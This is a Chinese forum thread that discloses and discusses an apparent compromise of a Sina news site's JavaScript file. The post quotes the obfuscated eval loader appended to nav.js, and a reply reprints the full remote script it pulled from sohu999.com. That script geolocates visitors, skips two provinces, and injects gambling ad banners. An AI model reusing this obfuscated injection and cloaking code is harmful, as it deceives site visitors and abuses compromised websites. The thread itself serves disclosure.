V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
工单节点使用指南
• 请用平和的语言准确描述你所遇到的问题
• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类,尊重是相互的
• 如果是关于 V2EX 本身的问题反馈,请使用 反馈 节点
wei193
V2EX  ›  全球工单系统

目测新浪的一个 js 被替换了

  •  3
     
  •   wei193 · 2018-04-20 09:39:12 +08:00 · 8334 次点击
    这是一个创建于 2414 天前的主题,其中的信息可能已经有所发展或是发生改变。

    http://tech.sina.com.cn/it/2018-04-19/doc-ifzihnep8570976.shtml 原文链接在这

    http://n.sinaimg.cn/common/channelnav/js/nav.js 被替换的 js 在这

    被增加的代码在这

    eval(function(d,f,a,c,b,e){b=function(a){return a.toString(f)};if(!"".replace(/^/,String)){for(;a--;)e[b(a)]=c[a]||b(a);c=[function(a){return e[a]}];b=function(){return"\\w+"};a=1}for(;a--;)c[a]&&(d=d.replace(new RegExp("\\b"+b(a)+"\\b","g"),c[a]));return d}('2.8("<0 3=\\"4\\" 5=\\"6/7\\" 1=\\"9\\" a=\\"b://c.d/e/f.g\\"></0>");',17,17,"script charset document id wf type text javascript writeln gb2312 src https sohu999 com imgs sina js".split(" "),0,{}));
    

    是被劫持的理由是广告跳转域名没有备案,也查不到是谁注册的,显示代理注册

    第 1 条附言  ·  2018-04-20 13:45:57 +08:00
    JS 已经内容已经被修改为
    11111111111111111111111111111111111111111111


    关于怎么发现的,因为安装了 ABP,习惯了没有广告的世界突然发现有个广告,然后还是彩票的,然后想了解到底是什么广告,然后就发现有点不对。。。
    39 条回复    2018-04-23 13:45:19 +08:00
    huiyifyj
        1
    huiyifyj  
       2018-04-20 09:49:48 +08:00 via Android
    sohu999.com 显示 DNS server 是 DNS pod
    emmm [:doge:]
    580a388da131
        2
    580a388da131  
       2018-04-20 09:52:35 +08:00
    今天也看到了 四川电信
    fadaixiaohai
        3
    fadaixiaohai  
       2018-04-20 09:55:15 +08:00
    是运营商替换的吗?
    autoxbc
        4
    autoxbc  
       2018-04-20 10:10:12 +08:00
    看起来像内部员工挣外快的手法,不过这 eval packer 过于此地无银了,还不如手写拆分 url
    7654
        5
    7654  
       2018-04-20 10:12:09 +08:00
    哈哈,可以举报一下新浪涉嫌 H&D&D
    LeungJZ
        6
    LeungJZ  
       2018-04-20 10:13:10 +08:00
    不会是那个右下角绿色闪啊闪的吧?
    M4ster
        7
    M4ster  
       2018-04-20 10:46:50 +08:00   ❤️ 7
    哈哈,看来北京和浙江的网友不好惹啊🐶。

    https://sohu999.com/imgs/sina.js
    ``` javascript
    loadScript('https://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js', function() {
    if (window.remote_ip_info.province == '北京' || window.remote_ip_info.province == '浙江') {
    return false
    } else {
    // 注入广告...
    }
    )
    ```
    fe619742721
        8
    fe619742721  
       2018-04-20 11:19:25 +08:00
    @M4ster 哈哈,想起来那个 http 劫持页面劫持到国务院头上的事情
    vuser
        9
    vuser  
       2018-04-20 11:39:38 +08:00
    @wei193 怎么发现的, 118 彩&瓢
    cattrace
        10
    cattrace  
       2018-04-20 12:33:00 +08:00
    很厉害,同问是怎么发现的
    janus77
        11
    janus77  
       2018-04-20 12:35:23 +08:00
    上海联通也挂了 DNS 是 114
    artoostark
        12
    artoostark  
       2018-04-20 12:40:52 +08:00
    广州鹏博士也有。
    flyz
        13
    flyz  
       2018-04-20 13:17:13 +08:00 via Android
    为什么我打开 js 文件,显示的是 1111111
    myleon
        14
    myleon  
       2018-04-20 13:19:00 +08:00
    刚才还有一刷新变成 11111111 了
    RiESA
        15
    RiESA  
       2018-04-20 13:28:39 +08:00
    是不是干的人也上 V 站? 居然没了
    xiaodongus
        16
    xiaodongus  
       2018-04-20 13:35:14 +08:00
    变成 111111 了,看来应该是内鬼无疑了
    wei193
        17
    wei193  
    OP
       2018-04-20 13:36:08 +08:00
    @vuser 因为我有 ABP,打开发现有个广告 然后还是彩票就想看个究竟
    blackhacker
        18
    blackhacker  
       2018-04-20 14:05:49 +08:00
    这个有点厉害啊 怎么做到的
    orm
        19
    orm  
       2018-04-20 14:06:58 +08:00
    看样子,新浪内鬼也上 V 站
    zoujun3281
        20
    zoujun3281  
       2018-04-20 14:15:49 +08:00
    @M4ster 大概新浪在北京跟浙江有公司
    zzmstring
        21
    zzmstring  
       2018-04-20 14:26:33 +08:00
    内鬼就在浏览过这个帖子的人中
    panlilu
        22
    panlilu  
       2018-04-20 14:35:05 +08:00
    这个被抓了是不是得坐牢了
    CloudnuY
        23
    CloudnuY  
       2018-04-20 14:49:20 +08:00   ❤️ 1
    广告劫持域名都上 https 了,你们的博客还不上?
    huiyifyj
        24
    huiyifyj  
       2018-04-20 14:52:58 +08:00 via Android
    @CloudnuY #23 角度刁钻
    boywang004
        25
    boywang004  
       2018-04-20 15:00:39 +08:00
    北京不好惹我理解……可浙江是哪位大神驻扎?
    wyx
        26
    wyx  
       2018-04-20 15:10:50 +08:00
    @boywang004 蒋光头
    betaShine
        27
    betaShine  
       2018-04-20 15:10:50 +08:00 via iPhone
    按新浪这流量,能捞不少钱吧 (´▽`)
    jijiwaiwai
        28
    jijiwaiwai  
       2018-04-20 15:12:20 +08:00
    @M4ster unction loadScript(a,b){var c=document.createElement("script");c.type="text/javascript";if(c.readyState){c.onreadystatechange=function(){if(c.readyState==="loaded"||c.readyState==="complete"){c.onreadystatechange=null;b()}}}else{c.onload=function(){b()}}c.src=a;document.getElementsByTagName("head")[0].appendChild(c)}function mobileCheck(){var c=false;(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))c=true})(navigator.userAgent||navigator.vendor||window.opera);return c}loadScript('https://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js',function(){if(window.remote_ip_info.province=='北京'||window.remote_ip_info.province=='浙江'){return false}else{var b=true;var c=false;var d=false;if(/Android|webOS|iPhone|iPod|ipad|BlackBerry/i.test(navigator.userAgent)){d=true}if(d==false){if(b!=false){var a='<div style="position:fixed;z-index:100;bottom:0;left:0;width:225px;padding-top:34px" id="fixed_left002">';a+='<div style="position:absolute;right:0;top:0;width:30px;height:30px;background:url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/PjwhRE9DVFlQRSBzdmcgUFVCTElDICItLy9XM0MvL0RURCBTVkcgMS4xLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL0dyYXBoaWNzL1NWRy8xLjEvRFREL3N2ZzExLmR0ZCI+PHN2ZyB0PSIxNTIzODg3MDM3MjM3IiBjbGFzcz0iaWNvbiIgc3R5bGU9IiIgdmlld0JveD0iMCAwIDEwMjQgMTAyNCIgdmVyc2lvbj0iMS4xIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHAtaWQ9IjE2NDgiIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iMzIiIGhlaWdodD0iMzIiPjxkZWZzPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+PC9zdHlsZT48L2RlZnM+PHBhdGggZD0iTTEwMjQgNTEyYzAtMjgyLjc2MzYzNi0yMjkuMjM2MzY0LTUxMi01MTItNTEyQzIyOS4yMzYzNjQgMCAwIDIyOS4yMzYzNjQgMCA1MTJjMCAyODIuNzYzNjM2IDIyOS4yMzYzNjQgNTEyIDUxMiA1MTJDNzk0Ljc2MzYzNiAxMDI0IDEwMjQgNzk0Ljc2MzYzNiAxMDI0IDUxMnpNMjgxLjYgNzA5LjQ5MjM2NCA0NzkuMDkyMzY0IDUxMiAyODEuNiAzMTQuNTA3NjM2IDMxNC41MDc2MzYgMjgxLjYgNTEyIDQ3OS4wOTIzNjRsMTk3LjQ5MjM2NC0xOTcuNDkyMzY0IDMyLjkwNzYzNiAzMi45MDc2MzZMNTQ0LjkwNzYzNiA1MTJsMTk3LjQ5MjM2NCAxOTcuNDkyMzY0LTMyLjkwNzYzNiAzMi45MDc2MzZMNTEyIDU0NC45MDc2MzYgMzE0LjUwNzYzNiA3NDIuNCAyODEuNiA3MDkuNDkyMzY0eiIgcC1pZD0iMTY0OSIgZmlsbD0iI2Q4MWUwNiI+PC9wYXRoPjwvc3ZnPg==) no-repeat;background-size:30px 30px" id="close_fixed_point001"></div>';a+='<a target="_blank" href="https://sohu999.com/imgs/118cp.html" style="display:block"><img src="https://sohu999.com/imgs/1.gif"></a>';a+='<a target="_blank" href="https://sohu999.com/imgs/ddc.html" style="display:block"><img src="https://sohu999.com/imgs/2.gif"></a>';a+='</div>';document.getElementsByTagName("body")[0].insertAdjacentHTML('beforeend',a);document.getElementById('close_fixed_point001').onclick=function(){document.getElementById('fixed_left002').style.display='none'}}if(c!=false){var a='<div style="position:fixed;z-index:100;bottom:0;right:0;width:225px;padding-top:34px" id="fixed_left003">';a+='<div style="position:absolute;right:0;top:0;width:30px;height:30px;background:url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/PjwhRE9DVFlQRSBzdmcgUFVCTElDICItLy9XM0MvL0RURCBTVkcgMS4xLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL0dyYXBoaWNzL1NWRy8xLjEvRFREL3N2ZzExLmR0ZCI+PHN2ZyB0PSIxNTIzODg3MDM3MjM3IiBjbGFzcz0iaWNvbiIgc3R5bGU9IiIgdmlld0JveD0iMCAwIDEwMjQgMTAyNCIgdmVyc2lvbj0iMS4xIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHAtaWQ9IjE2NDgiIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iMzIiIGhlaWdodD0iMzIiPjxkZWZzPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+PC9zdHlsZT48L2RlZnM+PHBhdGggZD0iTTEwMjQgNTEyYzAtMjgyLjc2MzYzNi0yMjkuMjM2MzY0LTUxMi01MTItNTEyQzIyOS4yMzYzNjQgMCAwIDIyOS4yMzYzNjQgMCA1MTJjMCAyODIuNzYzNjM2IDIyOS4yMzYzNjQgNTEyIDUxMiA1MTJDNzk0Ljc2MzYzNiAxMDI0IDEwMjQgNzk0Ljc2MzYzNiAxMDI0IDUxMnpNMjgxLjYgNzA5LjQ5MjM2NCA0NzkuMDkyMzY0IDUxMiAyODEuNiAzMTQuNTA3NjM2IDMxNC41MDc2MzYgMjgxLjYgNTEyIDQ3OS4wOTIzNjRsMTk3LjQ5MjM2NC0xOTcuNDkyMzY0IDMyLjkwNzYzNiAzMi45MDc2MzZMNTQ0LjkwNzYzNiA1MTJsMTk3LjQ5MjM2NCAxOTcuNDkyMzY0LTMyLjkwNzYzNiAzMi45MDc2MzZMNTEyIDU0NC45MDc2MzYgMzE0LjUwNzYzNiA3NDIuNCAyODEuNiA3MDkuNDkyMzY0eiIgcC1pZD0iMTY0OSIgZmlsbD0iI2Q4MWUwNiI+PC9wYXRoPjwvc3ZnPg==) no-repeat;background-size:30px 30px" id="close_fixed_point002"></div>';a+='<a target="_blank" href="https://sohu999.com/imgs/118cp.html" style="display:block"><img src="https://sohu999.com/imgs/1.gif"></a>';a+='<a target="_blank" href="https://sohu999.com/imgs/ddc.html" style="display:block"><img src="https://sohu999.com/imgs/2.gif"></a>';a+='</div>';document.getElementsByTagName("body")[0].insertAdjacentHTML('beforeend',a);document.getElementById('close_fixed_point002').onclick=function(){document.getElementById('fixed_left003').style.display='none'}}}else{var e='';var a='<div style="position:fixed;z-index:100;bottom:0;right:0;left:0;width:100%;padding-top:34px" id="fixed_mobile_002">';a+='<div style="position:absolute;right:0;top:0;width:30px;height:30px;background:url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/PjwhRE9DVFlQRSBzdmcgUFVCTElDICItLy9XM0MvL0RURCBTVkcgMS4xLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL0dyYXBoaWNzL1NWRy8xLjEvRFREL3N2ZzExLmR0ZCI+PHN2ZyB0PSIxNTIzODg3MDM3MjM3IiBjbGFzcz0iaWNvbiIgc3R5bGU9IiIgdmlld0JveD0iMCAwIDEwMjQgMTAyNCIgdmVyc2lvbj0iMS4xIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHAtaWQ9IjE2NDgiIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iMzIiIGhlaWdodD0iMzIiPjxkZWZzPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+PC9zdHlsZT48L2RlZnM+PHBhdGggZD0iTTEwMjQgNTEyYzAtMjgyLjc2MzYzNi0yMjkuMjM2MzY0LTUxMi01MTItNTEyQzIyOS4yMzYzNjQgMCAwIDIyOS4yMzYzNjQgMCA1MTJjMCAyODIuNzYzNjM2IDIyOS4yMzYzNjQgNTEyIDUxMiA1MTJDNzk0Ljc2MzYzNiAxMDI0IDEwMjQgNzk0Ljc2MzYzNiAxMDI0IDUxMnpNMjgxLjYgNzA5LjQ5MjM2NCA0NzkuMDkyMzY0IDUxMiAyODEuNiAzMTQuNTA3NjM2IDMxNC41MDc2MzYgMjgxLjYgNTEyIDQ3OS4wOTIzNjRsMTk3LjQ5MjM2NC0xOTcuNDkyMzY0IDMyLjkwNzYzNiAzMi45MDc2MzZMNTQ0LjkwNzYzNiA1MTJsMTk3LjQ5MjM2NCAxOTcuNDkyMzY0LTMyLjkwNzYzNiAzMi45MDc2MzZMNTEyIDU0NC45MDc2MzYgMzE0LjUwNzYzNiA3NDIuNCAyODEuNiA3MDkuNDkyMzY0eiIgcC1pZD0iMTY0OSIgZmlsbD0iI2Q4MWUwNiI+PC9wYXRoPjwvc3ZnPg==) no-repeat;background-size:30px 30px" id="close_fixed_point"></div>';a+='<a target="_blank" href="https://sohu999.com/imgs/118cp.html" style="display:block"><img src="https://sohu999.com/imgs/h2.jpg" width="100%"></a>';a+='<a target="_blank" href="https://sohu999.com/imgs/ddc.html" style="display:block"><img src="https://sohu999.com/imgs/h1.jpg" width="100%"></a>';a+='</div>';document.getElementsByTagName("body")[0].insertAdjacentHTML('beforeend',a);document.getElementById('close_fixed_point').onclick=function(){document.getElementById('fixed_mobile_002').style.display='none'}}}});
    laoyuan
        29
    laoyuan  
       2018-04-20 15:12:29 +08:00
    这种都是有产业链的,接单的、挂链的,窝案也很有可能,所以反而不好查。
    uucloud
        30
    uucloud  
       2018-04-20 15:15:05 +08:00
    这人惨了,lz nb 啊,很敏锐
    php300
        31
    php300  
       2018-04-20 15:26:07 +08:00
    浙江喜欢赌的老板太多了!所以也入住了
    miyuki
        32
    miyuki  
       2018-04-20 16:42:12 +08:00 via Android
    笑死
    DeWhite
        33
    DeWhite  
       2018-04-20 17:04:28 +08:00 via Android
    内鬼捞偏门,感觉应该是怕出事撤了。
    wujianxiong
        34
    wujianxiong  
       2018-04-20 17:08:30 +08:00
    这种广告太赚钱拉 ,做灰产真的要屏蔽一线城市的
    zangev5
        35
    zangev5  
       2018-04-20 17:37:19 +08:00 via iPhone
    观察入微啊 大佬
    TingHaiJamiE
        36
    TingHaiJamiE  
       2018-04-20 22:04:34 +08:00
    大胆的猜测,代码都有版本控制,要是内鬼,还是能查到的吧...
    mingyun
        37
    mingyun  
       2018-04-22 14:31:32 +08:00
    楼主探索精神可以的
    ShaoMing
        38
    ShaoMing  
       2018-04-22 19:41:48 +08:00
    为啥要偏偏撤离 北京 浙江!
    Lantian
        39
    Lantian  
       2018-04-23 13:45:19 +08:00
    @M4ster
    @ShaoMing
    估计是因为新浪的总部在北京,管这一块广告的公司在深圳吧。或者说,“内鬼”所在的公司在北京或者浙江。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1034 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 20:50 · PVG 04:50 · LAX 12:50 · JFK 15:50
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.